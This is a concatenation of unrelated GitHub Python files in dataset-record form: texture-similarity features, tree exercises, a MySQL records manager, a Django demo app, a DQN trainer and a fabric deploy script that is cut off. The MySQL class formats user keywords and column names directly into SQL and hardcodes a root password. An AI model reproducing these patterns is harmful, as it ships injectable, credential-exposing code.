np.abs(feature_1[1][scale][orient2])\n im23 = np.abs(feature_2[1][scale][orient2])\n stsim2.append(metric.compute_cross_term(\n im11, im13, im21, im23, 7).mean())\n return np.mean(stsim2)\n\n\nclass StsimC(TextureFeature):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt=5, mahalanobis_file=None, mahalanobis_type=\"cov\", scope=\"intraclass\",\n aca_color_cnt=0, color_dir=\"\"):\n self.mahalanobis_file = mahalanobis_file\n self.mahalanobis_type = mahalanobis_type\n self.scope = scope\n self.aca_color_cnt = aca_color_cnt\n self.color_dir = color_dir\n self.mahalanobis_matrix = None\n super().__init__(image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt)\n\n def compute_similarity(self, feature_1, feature_2):\n return mahalanobis(feature_1, feature_2, inv(self.mahalanobis_matrix))\n\n def generate_feature(self, fpath):\n vec = list(metric.Metric().STSIM_M(\n cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)))\n if self.aca_color_cnt:\n pixel_cnt = Counter()\n base_name = os.path.splitext(os.path.basename(fpath))[0]\n color_path = os.path.join(self.color_dir, base_name + '_lav.png')\n img_lab = color.rgb2lab(cv2.imread(color_path))\n for i in range(len(img_lab)):\n for j in range(len(img_lab[i])):\n pixel_cnt[tuple(img_lab[i][j])] += 1\n\n color_features = [i[0]\n for i in pixel_cnt.most_common(self.aca_color_cnt)]\n if len(color_features) < self.aca_color_cnt:\n color_features.extend(\n [(0, 0, 0) for i in range(self.aca_color_cnt - len(color_features))])\n color_features = [\n val for color_idx in color_features for val in color_idx]\n vec += color_features\n return vec\n\n def compute_mahalanobis_matrix(self, train_split):\n if self.mahalanobis_file and os.path.exists(self.mahalanobis_file):\n self.mahalanobis_matrix = np.load(self.mahalanobis_file)\n return\n class_matrix, train_features = [], []\n class_means = {}\n for img_class in set(self.labels):\n img_features = []\n for train_idx in train_split:\n if self.labels[train_idx] == img_class:\n img_features.append(self.features[train_idx])\n # Generate array of [var, cov, std] matrices from each class\n if self.scope == 'intraclass':\n if self.mahalanobis_type == 'var':\n class_matrix.append(np.var(img_features, axis=0))\n elif self.mahalanobis_type == 'std':\n class_matrix.append(np.std(img_features, axis=0))\n elif self.mahalanobis_type == 'cov':\n class_matrix.append(np.cov(img_features, rowvar=False))\n class_means[img_class] = np.mean(img_features, axis=0)\n train_features.extend(img_features)\n\n if self.scope == 'stsim_i':\n train_features = []\n for train_idx in train_split:\n normalized_feature = self.features[train_idx] - \\\n class_means[self.labels[train_idx]]\n train_features.append(normalized_feature)\n\n # Flatten training array for computing global M matrix for\n if self.scope in ('global', 'stsim_i'):\n if self.mahalanobis_type == 'std':\n self.mahalanobis_matrix = np.diag(\n np.std(train_features, axis=0))\n elif self.mahalanobis_type == 'var':\n self.mahalanobis_matrix = np.diag(\n np.var(train_features, axis=0))\n elif self.mahalanobis_type == 'cov':\n self.mahalanobis_matrix = np.cov(train_features, rowvar=False)\n # Compute single M matrix from individual class M matrices\n elif self.scope in ['intraclass', 'cluster']:\n if self.mahalanobis_type in ['std', 'var']:\n self.mahalanobis_matrix = np.diag(\n np.mean(class_matrix, axis=0))\n elif self.mahalanobis_type == 'cov':\n self.mahalanobis_matrix = np.mean(class_matrix, axis=0)\n if self.mahalanobis_file:\n np.save(self.mahalanobis_file, self.mahalanobis_matrix)\n\n\nclass LocalBinaryPattern(TextureFeature):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt, n_points, radius, lbp_method):\n self.n_points = n_points\n self.radius = radius\n self.lbp_method = lbp_method\n super().__init__(image_dir_or_saved_bin, class_cnt, save_features, fold_cnt)\n\n def compute_similarity(self, feature_1, feature_2):\n return entropy(feature_1, feature_2)\n\n def generate_feature(self, image_path):\n n_bins = 0\n img = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n lbp = local_binary_pattern(\n img, self.n_points, self.radius, method=self.lbp_method)\n n_bins = max(int(lbp.max() + 1), n_bins)\n lbp_hist = np.histogram(\n lbp, density=True, bins=n_bins, range=(0, n_bins))[0]\n return lbp_hist\n","repo_name":"JaredFern/stsim","sub_path":"TextureFeature.py","file_name":"TextureFeature.py","file_ext":"py","file_size_in_byte":12723,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"11262065406","text":"from tree_node import TreeNode\nimport random\n\n# Activity 1\ndef pretty_print_mod(root, indent=''):\n if root is None:\n return\n elif root.left is None:\n print(indent + str(root.val))\n pretty_print_mod(root.right, indent = indent+' ')\n print(f\"size() called on node {root.val}\")\n elif root.right is None:\n print(indent + str(root.val))\n pretty_print_mod(root.left, indent = indent+' ')\n x = tree_count(root.left)\n print(f\"size() called on node {root.val}\")\n elif root.right is None and root.left is None:\n print(indent + str(root.val))\n print(f\"size() called on node {root.val}\")\n else:\n print(indent + str(root.val))\n pretty_print_mod(root.right, indent = indent+' ')\n pretty_print_mod(root.left, indent = indent+' ')\n print(f\"size() called on node {root.val}\")\n print(f\"size() called on node {root.val}\")\n\ndef tree_count(root):\n '''\n Takes a tree as a parameter\n and returns the number of nodes\n in it.\n '''\n if root is None:\n return 0\n elif root.left is None:\n return 1 + tree_count(root.right)\n elif root.right is None:\n return 1 + tree_count(root.left)\n elif root.left is None and root.right is None:\n return 1\n else:\n return 1 + tree_count(root.left) + tree_count(root.right)\n\ndef random_insert(T):\n v = random.randint(0, 100)\n #x = random.randint(1, 2)\n if T == None:\n return TreeNode(v)\n elif v % 2 == 0:\n T.left = random_insert(T.left)\n elif v % 2 != 0:\n T.right = random_insert(T.right)\n return T\n\n# root = TreeNode(19)\n# for i in range(0, 19):\n# root = random_insert(root)\n#pretty_print_mod(root)\n# it gets called a lot of times, usually multiple times on the same node. This might cause problems later.\n\n# Activity 2\n# root = TreeNode(13)\n# root.left = TreeNode(26)\n# root.left.left = TreeNode(11)\n# root.left.left.left = TreeNode(80)\n\ndef fill_up_size_fields(root):\n if root is None:\n return 0\n size = 1\n if root.left is not None:\n fill_up_size_fields(root.left)\n size += root.left.size\n if root.right is not None:\n fill_up_size_fields(root.right)\n size += root.right.size\n root.size = size\n\n# Activity 3\n# In this case, the function would fail because some of the nodes would not have a size parameter associated with them.\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n self.size = 1 # the initial value should be one because this node has no children inititally\n# No we cannot, since the random tree building will add new nodes into spots where there were previously None, therefore causing our size parameter to display incorrect information.\ndef fill_up_size_fields_updated(root):\n if root is None:\n return 0\n else:\n if root.size is not None:\n return root.size\n root.size = 1 + fill_up_size_fields_updated(root.left) + fill_up_size_fields_updated(root.right)\n return root.size\n\n# Word of the day : Caching\n\n","repo_name":"avichalk/csc_120","sub_path":"In-Class/mar/15/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71545025753","text":"import numpy as np\nfrom scipy.linalg import toeplitz\nimport matplotlib.pyplot as plt\n\ndef Initialize(A, B, n, h):\n x = np.linspace(A, B, n)\n init_cond = np.sin(x) + 1/10 * np.sin(10*x)\n return init_cond, x\n\ndef ImplMatrix(r, n, h):\n row = np.zeros(n)\n row[0] = 1 + 2*r \n row[1] = -r\n\n mat = toeplitz(row) \n return mat\n\ndef Update(old, new):\n old = new\n return old\n\ndef Plot(x, data1, lbl1, data2, lbl2, a, itr):\n plot = plt.figure()\n plt.axvline(linewidth=0.5, color='black')\n plt.axhline(linewidth=0.5, color='black')\n plt.grid(axis='both')\n plt.title('koeficient difuse {} iterace {}'.format(a, itr))\n subplot = plot.add_subplot(111)\n\n axes = plt.gca()\n axes.set_xlim([0,2*3.1415926])\n plt.plot(x, data1, label=lbl1, \n linewidth=0.8, color='green')\n plt.plot(x, data2, label=lbl2, \n linewidth=0.8, color='red')\n plt.legend()\n plt.savefig('./results/a_{}/iter_{}.png'.format(a, itr), bbox_inches='tight')\n","repo_name":"david-moravec/homeworks","sub_path":"zapocet/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29298841084","text":"import mysql.connector\nfrom conexion import *\n\n\nclass NormativaBD():\n def __init__(self):\n #self.conexion = mysql.connector.connect(host=\"localhost\", user=\"root\", passwd=\"admin\", database=\"bdnormativas\")\n self.conexion = MySQLConnection(\"localhost\",\"root\",\"admin\", \"bdnormativas\", \"3306\")\n\n def obtenerTipoNormativa(self):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"SELECT * FROM TipoNormativa\")\n tipoNormativas = cursor.fetchall()\n y=0\n x=0\n for i in tipoNormativas:\n print(tipoNormativas[y][0], tipoNormativas[y][1])\n y+=1\n self.conexion.close()\n\n def insertarNuevaNormativa(self, idTipoNormativa, nroNormativa, fecha, descripcion, categoria, idTipoJurisdiccion, palabrasClave):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n sql = \"INSERT INTO normativa(idTipoNormativa, fecha, descripcion, palabrasClaves, idTipoJurisdiccion, nroNormativa, idCategoria) VALUES (%s,%s,%s,%s,%s,%s,%s)\"\n cursor.execute(sql,(idTipoNormativa, fecha, descripcion, palabrasClave, idTipoJurisdiccion, nroNormativa, categoria))\n self.conexion.commit()\n cursor.close()\n self.conexion.close()\n\n def consultarNormativas(self):\n self.conexion.connect()\n cursor=self.conexion.cursor()\n cursor.execute(\"SELECT * FROM normativa\")\n normativas = cursor.fetchall()\n y=0\n x=0\n for i in normativas:\n linea= \"\"\n for x in range (8):\n linea += str(normativas[y][x]) + \" | \"\n y+=1\n print(linea)\n return\n \n def obtenerNormativaPorNroNormativa(self,nroNormativa):\n self.conexion.connect()\n cursor=self.conexion.cursor()\n cursor.execute(\"SELECT * FROM normativa WHERE nroNormativa=%s\" , (nroNormativa,) ) \n normativas=cursor.fetchall() \n y=0\n x=0\n for i in normativas:\n linea= \"\"\n for x in range (8):\n linea += str(normativas[y][x]) + \" | \"\n y+=1\n print(i)\n return\n\n\n\n def eliminarNormativa(self, nroRegistro):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"DELETE FROM normativa WHERE nroRegistro=%s\", (nroRegistro,))\n self.conexion.commit()\n print(\"Fue eliminado exitosamente\")\n\n \n def buscar_pclave(self, palabras_clave):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n query = \"SELECT * FROM normativa WHERE \"\n conditions = []\n for palabra in palabras_clave:\n conditions.append(\"LOWER(palabrasClaves) LIKE '%{}%'\".format(palabra))\n query += \" OR \".join(conditions)\n cursor.execute(query)\n results = cursor.fetchall()\n for row in results:\n print(row)\n\n def obtenerCategorias(self):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"SELECT * from categoria\")\n categorias = cursor.fetchall()\n y=0\n x=0\n for i in categorias:\n for x in range (2):\n print(categorias[y][x])\n y+=1\n return\n \n def obtenerJurisdicciones(self):\n self.conexion.connect()\n cursor = self.conexion.cursor()\n cursor.execute(\"SELECT * from tipoJurisdiccion\")\n jurisdicciones = cursor.fetchall()\n y=0\n x=0\n for i in jurisdicciones:\n for x in range (2):\n print(jurisdicciones[y][x])\n y+=1\n return\n \n def actualizar_campo(self, registro_id, campo, nuevo_valor):\n self.conexion.connect()\n query = \"UPDATE categoria SET {} = %s WHERE idcategoria = %s\".format(campo)\n valores = (nuevo_valor, registro_id)\n cursor = self.conexion.cursor()\n cursor.execute(query, valores)\n self.conexion.commit()\n if cursor.rowcount > 0:\n print(\"Campo actualizado exitosamente.\")\n else:\n print(\"No se encontró el registro o no se realizaron cambios.\")\n","repo_name":"ISCP-2023-equipo-estudio/Grupo_estudio_TSDWAD","sub_path":"Python/normativaBD.py","file_name":"normativaBD.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"22521700628","text":"import numpy as np\nimport sys\n\nif (len(sys.argv) < 1):\n print('Usage:')\n print('python fastest_rectangle.py namefile')\n exit(1)\n\nfastest = 999999999.99\n\nwith open(sys.argv[1], 'r') as f:\n f.readline()\n for l in f.readlines():\n line = l.replace('\\n', '').split(' ')\n if (float(line[6]) < fastest):\n fastest = float(line[6])\n result = l\nprint(l)\n","repo_name":"LoniasGR/embed19-20","sub_path":"Lab1/Part1/scripts/fastest_rectangle.py","file_name":"fastest_rectangle.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"42274534716","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseNotFound\nimport datetime\nfrom django.views.decorators.http import require_http_methods\n\n#http decorator\n@require_http_methods([\"GET\"])\ndef showpg(request): \n return HttpResponse('

This is Http GET request.

')\n\n# loading templates\nfrom django.template import loader\ndef index(request): \n template = loader.get_template('index.html') # getting our template \n name={\n 'student':'Dk','class':'MCA'\n }\n return HttpResponse(template.render(name)) # rendering the template in HttpResponse \n\n# Create your views here.\ndef myfn(request):\n return HttpResponse('

This is my first Django project

')\ndef index3(request):\n tim=datetime.datetime.now()\n html=\"

Now Time is %s

\"%tim\n return HttpResponse(html)\ndef index2(request):\n a=1\n if a:\n return HttpResponseNotFound(\"

Not found

\")\n else:\n return HttpResponse(\"

page found

\")\n\n#loading image using static\ndef imag(request):\n return render(request,'imag.html')\n#loading js file using static\ndef js_file(request):\n return render(request,'script.html')\n#loading css file using static\ndef cs(request):\n return render(request,'cs.html')\n\n#loading model form\nfrom myapp.form import EmpForm\n\ndef inde(request):\n emp=EmpForm()\n return render(request,\"inde.html\",{'form':emp})\n\n\nfrom myapp.form import StudentForm \n \ndef inde2(request): \n student = StudentForm() \n return render(request,\"inde.html\",{'form':student}) \n\n#django validation\ndef emp(request): \n if request.method == \"POST\": \n form = EmpForm(request.POST) \n if form.is_valid(): \n try: \n return redirect('/') \n except: \n pass \n else: \n form = EmpForm() \n return render(request,'inde.html',{'form':form})\n\n#file upload\nfrom myapp.functions.functions import handle_uploaded_file\nfrom myapp.form import StudForm \ndef filep(request): \n if request.method == 'POST': \n student = StudForm(request.POST, request.FILES) \n if student.is_valid(): \n handle_uploaded_file(request.FILES['file']) \n return HttpResponse(\"File uploaded successfuly\") \n else: \n student = StudForm() \n return render(request,\"inde.html\",{'form':student}) \n\n#creating csv with django\nimport csv\ndef getfile(request):\n response=HttpResponse(content_type='text/csv')\n response['Content-Disposition']='attachment;filename=\"file.csv\"'\n writer = csv.writer(response) \n writer.writerow(['1001', 'John', 'Domil', 'CA']) \n writer.writerow(['1002', 'Amit', 'Mukharji', 'LA', '\"Testing\"']) \n return response \n\n#dynamic csv using django\nfrom myapp.models import Employee\ndef getdt(request):\n response=HttpResponse(content_type='text/csv')\n response['Content-Disposition']='attachment;filename=\"file2.csv\"'\n employees= Employee.objects.all()\n writer =csv.writer(response)\n for employee in employees:\n writer.writerow([employee.first_name,employee.last_name,employee.mbl])\n return response\n\n#using pdf in django\nfrom reportlab.pdfgen import canvas\ndef getpdf(request): \n response = HttpResponse(content_type='application/pdf') \n response['Content-Disposition'] = 'attachment; filename=\"sampl.pdf\"' \n p = canvas.Canvas(response) \n p.setFont(\"Times-Roman\", 55) \n p.drawString(100,700, \"my first pdf creaton\") \n p.showPage() \n p.save() \n return response \n\n#bootstrap\ndef boot(request):\n return render(request,'boots.html')\n\n#setting up mails\nfrom djangoapp import settings\nfrom django.core.mail import send_mail\n\ndef mails(request):\n sub=\"Greetings\"\n msg=\"Congratulations for your success dear lusu!! :)\"\n to=\"saidharanisai143@gmail.com\"\n res=send_mail(sub,msg,settings.EMAIL_HOST_USER,[to])\n if(res==1):\n msg=\"Mail sent successfully\"\n else:\n \"Mail could not sent\"\n return HttpResponse(msg)","repo_name":"dinskutty/Django_app","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37383463735","text":"'''\n1) 가장 짧은 길이 1을 start로, 랜선 중 가장 긴 길이를 end로 둔다.\n\n2) 이분탐색이 끝날 때까지 while 문을 돌린다.\n\n3) mid를 start와 end의 중간으로 두고, 모든 랜선 값을 mid로 나누어 총 몇개의 랜선이 나오나 살펴본다.\n\n4-1) 랜선이 목표치 이상이면 mid+1을 start로 두고 다시 while문 반복\n\n4-2) 랜선이 목표치 이하면 mid-1을 end로 두고 다시 while문 반복\n\n5) start와 end가 같아지면: 조건을 만족하는 최대의 랜선길이를 찾으면 탈출한다.\n\n6) 결과값인 end출력\n'''\n\nimport sys\n\nk, n = map(int, input().split())\nlan = [int(sys.stdin.readline()) for _ in range(k)]\nstart, end = 1, max(lan)\n\nwhile start <= end:\n mid = (start + end)//2\n lines = 0\n for i in lan:\n lines += i // mid\n if lines >= n:\n start = mid + 1\n else:\n end = mid - 1\nprint(end)\n","repo_name":"songhee-lee/2023-python-coding-test","sub_path":"이것이 코딩테스트다/5. Binary Search/sukkyeong/정렬이진탐색/5.랜선자르기.py","file_name":"5.랜선자르기.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42032063591","text":"def back_in_black_chapter_1():\n N = int(input())\n S = list(map(int, input()))\n Q = [int(input())-1 for _ in range(int(input()))]\n cnt = [0]*N\n for x in Q:\n cnt[x] ^= 1\n for i in range(N):\n if cnt[i] == 0:\n continue\n for j in range(i, N, i+1):\n S[j] ^= 1\n result = 0\n for i in range(N):\n if S[i] == 0:\n continue\n for j in range(i, N, i+1):\n S[j] ^= 1\n result += 1\n return result\n\nfor case in range(int(input())):\n print('Case #%d: %s' % (case+1, back_in_black_chapter_1()))\n","repo_name":"kamyu104/MetaHackerCup-2023","sub_path":"Round 1/back_in_black_chapter_1.py3","file_name":"back_in_black_chapter_1.py3","file_ext":"py3","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"11491412209","text":"import gym\nimport math\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom collections import namedtuple\nfrom itertools import count\nfrom PIL import Image\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nfrom torch.autograd import Variable\n\n\nfrom gym_minigrid.wrappers import *\nfrom collections import deque\n\nfrom gym_minigrid.window import Window\nfrom torch.utils.tensorboard import SummaryWriter\n\nenvs_to_run = [\n'MiniGrid-DoorKey-16x16-v0',\n 'MiniGrid-KeyCorridorS3R3-v0',\n 'MiniGrid-BlockedUnlockPickup-v0',\n 'MiniGrid-Unlock-v0',\n 'MiniGrid-Fetch-8x8-N3-v0',\n 'MiniGrid-Fetch-5x5-N2-v0',\n 'MiniGrid-Empty-8x8-v0',\n 'MiniGrid-FourRooms-v0',\n 'MiniGrid-SimpleCrossingS9N1-v0',\n 'MiniGrid-MultiRoom-N2-S4-v0',\n]\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nTransition = namedtuple('Transition', ('state', 'action', 'reward', 'next_state', 'done'))\n\n\n\nclass ReplayBuffer(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n transitions = random.sample(self.memory, batch_size)\n batch = Transition(*zip(*transitions))\n\n # Compute a mask of non-final states and concatenate the batch elements\n # (a final state would've been the one after which simulation ended)\n non_final_mask = torch.tensor(\n tuple(map(lambda s: s is not None, batch.next_state)), device=device, dtype=torch.bool)\n non_final_next_states = torch.cat(\n [s for s in batch.next_state if s is not None])\n state_batch = torch.cat(batch.state)\n action_batch = torch.cat(batch.action)\n reward_batch = torch.tensor(batch.reward, dtype=torch.float32)\n return state_batch,action_batch, reward_batch, non_final_next_states, torch.tensor(batch.done, dtype=torch.int64), non_final_mask\n\n def __len__(self):\n return len(self.memory)\n\n\nclass ConvDQN(nn.Module):\n\n def __init__(self, h, w, outputs):\n super(ConvDQN, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=2)\n self.bn1 = nn.BatchNorm2d(16)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)\n self.bn2 = nn.BatchNorm2d(32)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)\n self.bn3 = nn.BatchNorm2d(32)\n\n def conv2d_size_out(size, kernel_size=5, stride=2):\n return (size - (kernel_size - 1) - 1) // stride + 1\n\n convw = conv2d_size_out(conv2d_size_out(conv2d_size_out(w)))\n convh = conv2d_size_out(conv2d_size_out(conv2d_size_out(h)))\n linear_input_size = convw * convh * 32\n self.head = nn.Linear(linear_input_size, outputs)\n\n def forward(self, x):\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n return self.head(x.view(x.size(0), -1))\n\n\ndef init_env(env_name):\n env = gym.make(env_name)\n env.max_steps = 256\n window = Window('gym_minigrid - ' + env_name)\n return env, window\n\n\ndef process_frames(env):\n\n resize = T.Compose([T.ToPILImage(),\n T.Resize((64,64), interpolation=Image.CUBIC),\n T.Grayscale(),\n T.ToTensor()])\n screen = env.render(mode='rgb_array').transpose((2, 0, 1))\n _, screen_height, screen_width = screen.shape\n screen = torch.tensor(screen)\n return resize(screen).unsqueeze(0).to(device)\n\n\ndef select_action(state, params, policy_net, n_actions, steps_done):\n sample = random.random()\n eps_threshold = params['eps_end'] + (params['eps_start'] - params['eps_end']) * \\\n math.exp(-1. * steps_done / params['eps_decay'])\n steps_done += 1\n if sample > eps_threshold:\n with torch.no_grad():\n return policy_net(state).max(1)[1].view(1, 1), steps_done\n else:\n return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long), steps_done\n\n\ndef compute_td_loss(model, replay_buffer,params ,batch_size=32):\n\n state, action, reward, next_state, done, non_final_mask = replay_buffer.sample(batch_size)\n\n state = state.to(device)\n next_state = next_state.to(device)\n action = action.to(device)\n reward = reward.to(device)\n done = done.to(device)\n\n q_values = model(state)\n next_q_values = torch.zeros(batch_size, device=device)\n next_q_values[non_final_mask] = model(next_state).max(1)[0]\n\n q_value = q_values.gather(1, action).squeeze(1)\n expected_q_value = reward + params['gamma'] * next_q_values * (1 - done)\n\n loss = (q_value - Variable(expected_q_value.data)).pow(2).mean()\n\n params['optimizer'].zero_grad()\n loss.backward()\n params['optimizer'].step()\n\n return loss\n\n\ndef train(env, model, replay_buffer, params, writer, num_episodes=10000):\n episode_durations = []\n\n steps_done = 0\n counter = 0\n for i_episode in range(num_episodes):\n # Initialize the environment and state\n env.reset()\n state = process_frames(env)\n rew_ep = 0\n loss_ep = 0\n losses = []\n for t in count():\n # Select and perform an action\n action, steps_done = select_action(state, params, model, env.action_space.n, steps_done)\n\n _, reward, done, _ = env.step(action.item())\n reward = torch.tensor([reward], device=device)\n\n rew_ep += reward.item()\n current_screen = process_frames(env)\n if not done:\n next_state = current_screen\n else:\n next_state = None\n\n # Store the transition in memory\n replay_buffer.push(state, action, reward, next_state, done)\n\n # Move to the next state\n prev_state = state\n state = next_state\n\n # Perform one step of the optimization (on the target network)\n if len(replay_buffer) > 32:\n loss_ep = compute_td_loss(model, replay_buffer, params)\n losses.append(loss_ep.item())\n writer.add_scalar('Loss/iter',loss_ep, counter)\n counter += 1\n\n if done:\n episode_durations.append(t + 1)\n writer.add_scalar('Reward/episode', rew_ep, i_episode)\n print(rew_ep)\n\n # fig, ax = plt.subplots()\n # plt.imshow(prev_state.squeeze(0).cpu().permute(1, 2, 0).squeeze(2).numpy(), interpolation='none')\n # plt.title('Last state')\n # writer.add_figure(tag='simple_dqn_last', figure=fig)\n #\n # plt.show()\n # writer.add_scalar('Ep duration', t+1, i_episode)\n loss = np.sum(losses)\n writer.add_scalar('Loss/episode', loss/(t+1), i_episode)\n\n break\n\n return\n\n\ndef main():\n params = {\n 'batch_size': 128,\n 'gamma': 0.999,\n 'eps_start': 0.9,\n 'eps_end':0.05,\n 'eps_decay': 200,\n 'target_update': 100\n }\n writer = SummaryWriter(f'deep_rl/dqn_conv_network_832_{device}_{params[\"gamma\"]}_{params[\"eps_start\"]}_{params[\"eps_end\"]}_{params[\"eps_decay\"]}')\n\n env, window = init_env(envs_to_run[0])\n env.see_through_walls = False\n env.agent_view_size = 3\n init_screen = process_frames(env)\n env.reset()\n\n _, _, screen_height, screen_width = init_screen.shape\n n_actions = env.action_space.n\n\n model = ConvDQN(screen_height, screen_width, n_actions).to(device)\n\n optimizer = optim.Adam(model.parameters(), lr=0.00001)\n memory = ReplayBuffer(1000)\n params['optimizer'] = optimizer\n\n train(env, model, memory, params, writer)\n torch.save(model.state_dict(), 'dqn_conv_8x8.pt')\n return\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CatarauCorina/creativai","sub_path":"relational_module/baseline_dqn.py","file_name":"baseline_dqn.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74257393432","text":"import os\nimport sys\nimport torch\nimport subprocess\nfrom pathlib import Path\nfrom dataclasses import dataclass\n\nfrom torchbenchmark.util.e2emodel import E2EBenchmarkModel\n\nfrom typing import Optional, List\n\nCURRENT_DIR = Path(os.path.dirname(os.path.realpath(__file__)))\nFAMBENCH_ROOT = CURRENT_DIR.parent.parent.parent.joinpath(\"submodules\", \"FAMBench\")\n\ndef _create_data_dir(data_dir: str):\n data_dir = Path(data_dir)\n data_dir.mkdir(parents=True, exist_ok=True)\n return data_dir\n\ndef _get_fambench_test_root(name: str):\n xlmr_ootb_root = FAMBENCH_ROOT.joinpath(\"benchmarks\")\n assert xlmr_ootb_root.exists(), f\"Can't find FAMBench source at {xlmr_ootb_root.absolute()},\" \\\n \"please check out the submodules.\"\n return xlmr_ootb_root\n\n@dataclass\nclass FAMBenchXLMREvalConfig:\n \"\"\"\n Original config reference:\n https://github.com/facebookresearch/FAMBench/blob/main/benchmarks/run_xlmr_ootb.sh\n \"\"\"\n config_name = \"default-config\"\n nbatches = 10\n batchsize = 16\n seqlength = 16\n vocabsize = 250000\n warmupbatches = 1\n log_dir = os.path.join(CURRENT_DIR, \".data\", \"logs\")\n config_flags=[\"--inference-only\", f\"--num-batches={nbatches}\", f\"--batch-size={batchsize}\", \\\n f\"--sequence-length={seqlength}\", f\"--vocab-size={vocabsize}\", \\\n f\"--famconfig={config_name}\", \"--half-model\", f\"--warmup-batches={warmupbatches}\", \\\n f\"--logdir={log_dir}\"]\n\nclass Model(E2EBenchmarkModel):\n DEFAULT_EVAL_BSIZE = FAMBenchXLMREvalConfig.batchsize\n CANNOT_SET_CUSTOM_OPTIMIZER = True\n \n def __init__(self, test: str, batch_size: Optional[int]=None, extra_args: List[str]=[]):\n super().__init__(test=test, batch_size=batch_size, extra_args=extra_args)\n if not torch.cuda.is_available():\n raise NotImplementedError(\"FAMBench only support running on Nvidia GPU.\")\n self.device = \"cuda\"\n self.device_num = torch.cuda.device_count()\n self.name = \"xlmr\"\n self.implementation = \"ootb\"\n self.code_root = _get_fambench_test_root(self.name)\n if test == \"eval\":\n self.config = FAMBenchXLMREvalConfig()\n self.config.batchsize = self.batch_size\n self.num_examples = self.config.nbatches * self.batch_size\n _create_data_dir(self.config.log_dir)\n\n def train(self):\n raise NotImplementedError(\"FAMBench XLMR train is not implemented yet.\")\n\n def eval(self):\n prog_args = [sys.executable, f\"{self.name}/{self.implementation}/{self.name}.py\"]\n prog_args.extend(self.config.config_flags)\n subprocess.check_call(prog_args, cwd=self.code_root)\n","repo_name":"pytorch/benchmark","sub_path":"torchbenchmark/e2e_models/fambench_xlmr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"5"} +{"seq_id":"6841114968","text":"#!/usr/bin/python3\n\"\"\"This module contains a fabric based function that\ncreates and distributes an archive to web servers,\nusing the function deploy:\n\"\"\"\nfrom fabric.api import local, runs_once\nfrom datetime import datetime\nfrom os import path\nfrom fabric.api import run, env, put\n\n\nenv.hosts = ['100.25.45.230', '54.175.100.32']\n\n\n@runs_once\ndef do_pack():\n \"\"\"generates a .tgz archive from the contents of the web_static\n\n Functionality:\n - Creates a directory versions\n - Collects a file in we' '\n\n Returns:\n return the archive path if the archive has been correctly\n generated. Otherwise, it should return None\n \"\"\"\n date = str(datetime.utcnow().date()).replace('-', '')\n time = str(datetime.utcnow().time()).replace(':', '').split('.')[0]\n if time[0] == '0':\n time = time[1:]\n if not path.exists('versions'):\n local('mkdir -p versions')\n arch = \"versions/web_static_{}{}.tgz\".format(date, time)\n result = local('tar -cvzf {} web_static'.format(arch)).failed\n\n if path.exists(arch) and result is False:\n return arch\n else:\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\"distributes an archive to web servers.\n\n args:\n archive_path: pathname to the archive to distribute.\n\n Functionality:\n - Uploads the archive to the /tmp/ directory of the web server\n - Uncompresses the archive to the folder /data/web_static/releases/\n on the web server\n - Deletes the archive from the web server\n - Deletes the symbolic link /data/web_static/current from the web server\n - Creates a new the symbolic link /data/web_static/current on the\n web server, linked to the new version of your code\n (/data/web_static/releases/)\n\n Returns:\n True if all operations have been done 